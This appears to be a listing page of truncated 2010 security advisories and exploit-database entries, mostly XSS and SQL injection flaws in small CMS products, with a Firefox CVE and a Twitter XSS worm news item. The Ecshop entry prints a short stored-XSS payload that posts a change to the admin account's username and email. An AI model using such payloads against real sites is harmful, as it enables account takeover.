Lantern CMS Cross Site Scripting

================================== Vulnerability ID: HTB22621 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinlanterncms1.html Product: Lantern CMS Vendor: Lantern http://www.lanterncms.com/www/html/7-home-page.asp Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions...

expression-xss.txt

=================================== Vulnerability ID: HTB22618 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinexpressioncms1.html Product: Expression Vendor: Backbone Technology http://www.backbonetechnology.com Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions...

Pluck 4.6.3 Cross Site Scripting

Vulnerability ID: HTB22610 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinpluck.html Product: Pluck Vendor: Pluck Team http://www.pluck-cms.org Vulnerable Version: 4.6.3 and probably prior versions Vendor Notification: 15 September 2010 Vulnerability Type: XSS Cross Site Scripting...

Horde IMP Webmail 4.3.7 - fetchmailprefs.php HTML Injection

Horde IMP Webmail 4.3.7 - fetchmailprefs.php HTML Injection source: https://www.securityfocus.com/bid/43515/info Horde IMP Webmail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data before it is used in dynamic content. Attacker-supplied HTML ...

Persistent XSS Bug on Twitter Exploited by Worm

UPDATE— Within an hour of reports surfacing about a cross-site scripting bug on the Twitter home page, a worm exploiting the bug was released on the site. However, engineers at Twitter have repaired the bug and say that it no longer should be exploitable. The bug appeared Tuesday morning and...

Ecshop2.7.2持久型XSS（可获得管理员帐号）

简要描述： 个人资料修改时，Javascript代码过滤不够严格，XSS代码直接进入数据库 详细说明： 密码保护问题这一项，没有使用正则过滤，其他的的都有正则过滤。我们可以在密码保护问题里输入XSS，但是后台查看会员资料是不显示密码保护问题的，所以这里必须要网站后台添加了新的 “会员注册项”时，后台查看资料就会显示了，此处填入一段引入外部js的代码:" 外部test.js文件内容如下 Ajax.call'privilege.php?act=update','id=1&username=heihei&[email protected]','',"POST","JSON"; 漏洞证明：...

Mollify 1.6 - 'index.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/43262/info Mollify is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary JavaScript code in the browser of an unsuspecting user in the contex...

CVE-2010-2762

The XPCSafeJSObjectWrapper class in the SafeJSObjectWrapper aka SJOW implementation in Mozilla Firefox 3.6.x before 3.6.9 and Thunderbird 3.1.x before 3.1.3 does not properly restrict objects at the end of scope chains, which allows remote attackers to execute arbitrary JavaScript code with chrom...

WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting

Author: Craw Email: [email protected] Software Link: http://wordpress.org/extend/plugins/events-manager-extended/ Version: 3.1.2 Category: webapplications ======================================================= + ExploiT 1 : If you are allowed to leave a comment: Persistent XSS Vulnerability: You...

XSS vulnerability in Rumba CMS tags

Vulnerability ID: HTB22591 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinrumbacms.html Product: Rumba CMS Vendor: Rumba Netware Ltd. http://rumbacms.com Vulnerable Version: 2.4 and Probably Prior Versions Vendor Notification: 18 August 2010 Vulnerability Type: Stored XSS Cross Site...

ArtGK Cross Site Scripting

===================================== Vulnerability ID: HTB22588 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinartgkcms1.html Product: ArtGK CMS Vendor: ArtGK http://artgk-cms.ru/ Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions Vendor Notification: 18 August 201...

XSS vulnerability in CompuCMS

Vulnerability ID: HTB22581 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityincompucms1.html Product: CompuCMS Vendor: CompuSoft A/S http://www.compusoft.dk/ Vulnerable Version: Current at 06.08.2010 and Probably Prior Versions Vendor Notification: 09 August 2010 Vulnerability Type: XSS...

Prometeo 1.0.65 SQL Injection

// / ////// //////// /// / / / / // / / / / /// //////// / / // / / / // / // /// //////// // ================================= Prometeo vers. 1.0.65 -SQLi Vulnerability- ================================= -Vulnerability ID: LD3-Product: Prometeo-Vendor: Prometeo...

Prometeo v1.0.65 SQL Injection Vulnerability

Exploit for php platform in category web applications ============================================ Prometeo v1.0.65 SQL Injection Vulnerability ============================================ Prometeo vers. 1.0.65 -SQLi Vulnerability- ================================= -Vulnerability ID: LD3-Product:...

Prometeo 1.0.65 - SQL Injection

Prometeo 1.0.65 - SQL Injection // / ////// //////// /// / / / / // / / / / /// //////// / / // / / / // / // /// //////// // ================================= Prometeo vers. 1.0.65 -SQLi Vulnerability- ================================= -Vulnerability ID: LD3-Product: Prometeo-Vendor: Prometeo...

XSS vulnerability in CMSimple

Vulnerability ID: HTB22558 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityincmsimple.html Product: CMSimple Vendor: Peter Andreas Harteg http://www.cmsimple.org/ Vulnerable Version: 3.3 and Probably Prior Versions Vendor Notification: 02 August 2010 Vulnerability Type: XSS Cross Site...

XSS vulnerability in Onyx

Vulnerability ID: HTB22536 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinonyx.html Product: Onyx Vendor: Hulihan Applications http://hulihanapplications.com/projects/onyx Vulnerable Version: 0.3.2 and Probably Prior Versions Vendor Notification: 27 July 2010 Vulnerability Type: XSS...

XSS vulnerability in i-Web Suite

Vulnerability ID: HTB22544 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityiniwebsuite.html Product: i-Web Suite Vendor: immediaC world wide Inc http://www.immediac.com/ Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions Vendor Notification: 27 July 2010 Vulnerabilit...

i-Web Suite SQL Injection / Cross Site Scripting

========================================= Vulnerability ID: HTB22544 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityiniwebsuite.html Product: i-Web Suite Vendor: immediaC world wide Inc http://www.immediac.com/ Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions Vend...

KnowledgeTree 3.5.2 Community Edition - Persistent Cross-Site Scripting

Exploit Title: KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability Date: 2010-08-11 Author: @fdiskyou e-mail: rui at deniable.org Software Link: http://www.knowledgetree.com/products/community/download Version: 3.5.2 Notes: Fixed in the last version. Go to search box or search...